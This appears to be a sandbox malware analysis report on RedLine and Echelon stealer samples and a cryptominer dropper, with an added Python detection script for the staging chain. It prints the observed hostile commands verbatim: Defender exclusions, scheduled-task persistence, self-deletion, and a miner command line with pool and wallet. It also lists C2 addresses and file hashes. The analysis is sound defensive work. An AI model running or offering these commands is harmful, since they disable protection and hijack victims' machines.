C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\cmd.exe
C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9CnVX+ALijX6xMxSjb1GpdkRKRzu9R9fDFnn2Jk5tiB521c56MeySJCVvaV5sI5rrRsTcEJRRsj0lVopee3kzDJD3W6xwTmhYz+Ng/th6kws=" --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| N/A | 82.146.43.167:80 | 82.146.43.167 | tcp |
| N/A | 8.8.8.8:53 | iplogger.org | udp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 45.82.179.116:10425 | 45.82.179.116 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | sanctam.net | udp |
| N/A | 185.65.135.248:58899 | sanctam.net | tcp |
| N/A | 185.65.135.248:58899 | sanctam.net | tcp |
| N/A | 8.8.8.8:53 | bitbucket.org | udp |
| N/A | 104.192.141.1:443 | bitbucket.org | tcp |
| N/A | 104.192.141.1:443 | bitbucket.org | tcp |
| N/A | 8.8.8.8:53 | pool.hashvault.pro | udp |
| N/A | 168.119.38.182:80 | pool.hashvault.pro | tcp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
30s
Max time network
132s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\Sgsmmodul.com | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Sets file to hidden
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1796 set thread context of 2572 | N/A | C:\NSpack\updIns\mmscx.exe | C:\NSpack\updIns\mmscx.exe |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\file3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
| N/A | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\NSpack\updIns\mmscx.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\file3.exe
"C:\Users\Admin\AppData\Local\Temp\file3.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\tetracom.vbs" /f=CREATE_NO_WINDOW install.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\NSpack\updIns\44t.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 7
C:\NSpack\updIns\Sgsmmodul.com
"Sgsmmodul.com" e -pEktfsdu78s8f87Ap8pHr6Mqaq9SQ mit.rar
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\sevenup.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\NSpack\updIns\gg4359.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\NSpack\updIns\mmscx.exe
mmscx.exe /start
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sgsmmodul.com
C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\NSpack\updIns"
C:\Windows\SysWOW64\timeout.exe
timeout 4
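The process list above is the whole staging routine in order: a VBScript launched from C:\NSpack\updIns starts a batch file, which sleeps, runs the dropped Sgsmmodul.com with an archiver-style extract command carrying the archive password inline, hides the staging directory with attrib +s +h, starts mmscx.exe, force-kills the extractor, and unhides the directory. The Python below is an added example, not part of the report or of the sandbox's own signatures: it encodes those steps as rules and runs them over the process entries transcribed from this list. The rule names, the trusted-location prefixes and the decision to treat a 7-Zip/RAR-style `e -p<password> <archive>` command line as a finding are this example's assumptions.

```python
"""Heuristic review of a sandbox process list for the staged-extraction pattern
in this report: script host -> cmd/batch -> password-protected archive
extraction -> staging directory hidden -> payload started -> tool killed ->
directory unhidden. Added example; rule names and thresholds are assumptions,
the events are transcribed from the report."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    image: str    # image path as recorded by the sandbox
    cmdline: str  # command line as recorded by the sandbox


# Transcribed from the process list above (win10v20210410 run).
EVENTS = [
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\file3.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\file3.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\tetracom.vbs" /f=CREATE_NO_WINDOW install.cmd'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\NSpack\updIns\44t.bat" "'),
    ProcEvent(r"C:\Windows\SysWOW64\timeout.exe", "timeout 7"),
    ProcEvent(r"C:\NSpack\updIns\Sgsmmodul.com", '"Sgsmmodul.com" e -pEktfsdu78s8f87Ap8pHr6Mqaq9SQ mit.rar'),
    ProcEvent(r"C:\Windows\SysWOW64\timeout.exe", "timeout 6"),
    ProcEvent(r"C:\Windows\SysWOW64\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\NSpack\updIns\sevenup.vbs"'),
    ProcEvent(r"C:\Windows\SysWOW64\timeout.exe", "timeout 8"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\NSpack\updIns\gg4359.bat" "'),
    ProcEvent(r"C:\Windows\SysWOW64\attrib.exe", r'attrib +s +h "C:\NSpack\updIns"'),
    ProcEvent(r"C:\Windows\SysWOW64\timeout.exe", "timeout 2"),
    ProcEvent(r"C:\NSpack\updIns\mmscx.exe", "mmscx.exe /start"),
    ProcEvent(r"C:\NSpack\updIns\mmscx.exe", "mmscx.exe /start"),
    ProcEvent(r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im Sgsmmodul.com"),
    ProcEvent(r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im Sgsmmodul.com"),
    ProcEvent(r"C:\Windows\SysWOW64\attrib.exe", r'attrib -s -h "C:\NSpack\updIns"'),
    ProcEvent(r"C:\Windows\SysWOW64\timeout.exe", "timeout 4"),
]

TRUSTED_ROOTS = (r"c:\windows", r"c:\program files")  # prefix also covers "program files (x86)"
SCRIPT_RE = re.compile(r'[a-z]:\\[^"\s]*?\.(?:vbs|vbe|js|jse|wsf|bat|cmd)\b', re.I)
EXTRACT_RE = re.compile(r'(?:^|\s)[ex]\s+-p(\S+)\s+(\S+)')  # 7-Zip/RAR style: e -p<pw> <archive>
ATTRIB_RE = re.compile(r'attrib\s+((?:[+-][sh]\s+)+)"?([^"]+?)"?\s*$', re.I)


def _norm(path: str) -> str:
    return str(PureWindowsPath(path)).lower()


def _trusted(path: str) -> bool:
    return _norm(path).startswith(TRUSTED_ROOTS)


def analyze(events: list[ProcEvent]) -> list[dict]:
    """Return one finding per matched rule; 'event' is the index into `events`."""
    findings: list[dict] = []
    hidden: set[str] = set()       # paths attrib +h'd earlier in the chain
    dropped: dict[str, str] = {}   # basename -> image of every non-trusted image seen
    sleeps: list[int] = []

    def hit(rule: str, event, detail: str) -> None:
        findings.append({"rule": rule, "event": event, "detail": detail})

    for i, ev in enumerate(events):
        img = _norm(ev.image)
        base = PureWindowsPath(img).name
        if not _trusted(img):
            dropped[base] = ev.image
            if str(PureWindowsPath(img).parent) in hidden:
                hit("exec_from_hidden_staging_dir", i, ev.image)
        if base in ("wscript.exe", "cscript.exe", "cmd.exe"):
            for script in SCRIPT_RE.findall(ev.cmdline):
                if not _trusted(script):
                    hit("script_host_untrusted_script", i, script)
        m = EXTRACT_RE.search(ev.cmdline)
        if m:
            hit("password_protected_extract", i,
                f"tool={ev.image} archive={m.group(2)} password={m.group(1)}")
        if base == "attrib.exe" and (m := ATTRIB_RE.search(ev.cmdline)):
            flags, target = m.group(1).split(), _norm(m.group(2))
            if "+h" in flags:
                hidden.add(target)
                hit("hide_path", i, target)
            elif "-h" in flags and target in hidden:
                hit("unhide_path_after_use", i, target)
        if base == "taskkill.exe" and (m := re.search(r"/im\s+(\S+)", ev.cmdline, re.I)):
            if m.group(1).lower() in dropped:
                hit("kill_own_dropped_tool", i, dropped[m.group(1).lower()])
        if base == "timeout.exe" and (m := re.search(r"timeout\s+(?:/t\s+)?(\d+)", ev.cmdline, re.I)):
            sleeps.append(int(m.group(1)))
    if len(sleeps) >= 3:  # several short sleeps in one chain: pacing / sandbox time-out evasion
        hit("timeout_pacing", None, f"{len(sleeps)} calls, {sum(sleeps)}s total")
    return findings


def rule_counts(findings: list[dict]) -> dict[str, int]:
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f['rule']:32} {str(f['event']):>4}  {f['detail']}")
```

Run as a script it prints twelve findings for this chain; the password_protected_extract finding carries the archive name and the inline password, which is the first thing to pull out of such a report because it lets you open mit.rar from the dropped files without running anything.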
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sandedean.xyz | udp |
| N/A | 212.224.105.82:80 | sandedean.xyz | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/2404-114-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\tetracom.vbs
| MD5 | bdc0fb5cada9a89f074961224aaf4e63 |
| SHA1 | 9284fe4ecc0fde705fc596dd89191c02915fd7a4 |
| SHA256 | b6156e744da7ffcd5e47e78d487b2ad78b1babf44aaa4145d706247f308106db |
| SHA512 | 83cdf2cdc78106075fe5d8dfaa84fabae7251e76d8b706e74491291a03366bacd94ede79893e62f62f52c13c4cf1e5b5e53ebd49942d3789b01724464ee6ee28 |
C:\NSpack\updIns\44t.bat
| MD5 | 96c69dbc1233bfa7c5e883658e0758d4 |
| SHA1 | 613179fa74db9e71516bdb3a93341e9d90c4ecba |
| SHA256 | deb0fa40647bb04decbdf7e62fd62985bceb5a47ab5f15556763b8db1266acde |
| SHA512 | 43d0621374de43a216086807ac90f3dac4339975cfca251e762c84680bbe4932dfcfee9d08e5c2ff113fa2b4db50e4e8ede960864da34d8905e76851ed91e0d3 |
memory/2752-117-0x0000000000000000-mapping.dmp
memory/3916-118-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\dc.isi
| MD5 | fbd467e1613c53b03376e987f3dbf2da |
| SHA1 | e2ca3ff625122f49e8a382dee32d0ca2f98648bf |
| SHA256 | cca183bc9bb6e35a4713e1e25e80147ff5ab3857984a22ce74b5836f6e98ab68 |
| SHA512 | e2cf3762d688a9d4b43224e86a258751085734af3da3bac93cc3baabb8499b2147c8026dcfc9745fedc5b906116cf1e59f010ad342b43ae242dbc47755fc0e05 |
memory/1540-120-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/3328-122-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\sevenup.vbs
| MD5 | 6a551928353982ab64107a4929c91c91 |
| SHA1 | b68ee5e77a722638f184d0fbf6a4834bb8cc188e |
| SHA256 | 0281bbb85161fdb990c6f1c149a7e4bbaafe262f028e4fb66ffa995e2c4a45f3 |
| SHA512 | 870ef201fafd9d0036dcb4ea912676157075089390c9fecd0ad45d805e38bd74c5dc1fd413e9b765df50249628968ef8684b1b9ea57e2340769553e818c2159d |
memory/1608-124-0x0000000000000000-mapping.dmp
memory/3696-125-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\gg4359.bat
| MD5 | b4be21a8f4bb91b11ccaf08b39b679d5 |
| SHA1 | b3da567bb1072168b54866ee29301bde61bdc45e |
| SHA256 | 35e6fbd496632c91eb924e1d3b7749eeba36125bc4551624786b171bea1d465d |
| SHA512 | a52f7e9ad3ae76abe66920608c8b33a899ace0a4f4600903dc721a822114d5928cd85701a7405ef8ee1dc1aaa295174124a63ccec3e3fd3e347f01dbb2011f3c |
memory/1728-127-0x0000000000000000-mapping.dmp
memory/3868-128-0x0000000000000000-mapping.dmp
memory/1828-129-0x0000000000000000-mapping.dmp
memory/1796-130-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/2572-133-0x0000000000400000-0x0000000000434000-memory.dmp
memory/2572-134-0x000000000040CD2F-mapping.dmp
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/2404-136-0x0000000000000000-mapping.dmp
memory/2572-137-0x0000000000400000-0x0000000000434000-memory.dmp
memory/344-138-0x0000000000000000-mapping.dmp
memory/2572-139-0x00000000020C0000-0x00000000020DD000-memory.dmp
memory/2228-140-0x0000000000000000-mapping.dmp
memory/2572-141-0x0000000004980000-0x0000000004981000-memory.dmp
memory/3516-142-0x0000000000000000-mapping.dmp
memory/2572-143-0x0000000004910000-0x000000000492B000-memory.dmp
memory/2572-144-0x0000000004E80000-0x0000000004E81000-memory.dmp
memory/2572-145-0x00000000054F0000-0x00000000054F1000-memory.dmp
memory/2572-146-0x0000000005510000-0x0000000005511000-memory.dmp
memory/2572-147-0x0000000005570000-0x0000000005571000-memory.dmp
memory/2572-148-0x0000000004970000-0x0000000004971000-memory.dmp
memory/2572-149-0x0000000004972000-0x0000000004973000-memory.dmp
memory/2572-150-0x0000000004973000-0x0000000004974000-memory.dmp
memory/2572-151-0x0000000004974000-0x0000000004976000-memory.dmp
memory/2572-152-0x0000000005700000-0x0000000005701000-memory.dmp
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/2572-154-0x00000000062E0000-0x00000000062E1000-memory.dmp
memory/2572-155-0x00000000064B0000-0x00000000064B1000-memory.dmp
memory/2572-156-0x0000000006BE0000-0x0000000006BE1000-memory.dmp
memory/2572-157-0x0000000007050000-0x0000000007051000-memory.dmp
memory/2572-158-0x00000000071A0000-0x00000000071A1000-memory.dmp
memory/2572-159-0x0000000007170000-0x0000000007171000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210408
Max time kernel
23s
Max time network
76s
Command Line
Signatures
Echelon
Echelon log file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NewHacks.exe
"C:\Users\Admin\AppData\Local\Temp\NewHacks.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 18.118.55.110:50501 | N/A | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 23.21.173.155:443 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| N/A | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| N/A | 8.8.8.8:53 | gfs270n074.userstorage.mega.co.nz | udp |
| N/A | 89.44.168.241:80 | gfs270n074.userstorage.mega.co.nz | tcp |
Files
memory/652-114-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/652-116-0x0000000000D00000-0x0000000000D02000-memory.dmp
memory/652-117-0x00000000028F0000-0x00000000028F1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210410
Max time kernel
34s
Max time network
77s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1816 set thread context of 1644 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\Setup.exe
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 185.92.73.140:80 | 185.92.73.140 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
Files
memory/1816-60-0x0000000075EF1000-0x0000000075EF3000-memory.dmp
memory/1816-61-0x0000000000DB0000-0x0000000000DB1000-memory.dmp
memory/1816-63-0x0000000000690000-0x0000000000691000-memory.dmp
memory/1816-64-0x00000000007A0000-0x00000000007C1000-memory.dmp
memory/1644-65-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1644-66-0x0000000000418E4E-mapping.dmp
memory/1644-68-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1644-70-0x0000000004D10000-0x0000000004D11000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210410
Max time kernel
16s
Max time network
68s
Command Line
Signatures
Echelon
Echelon log file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
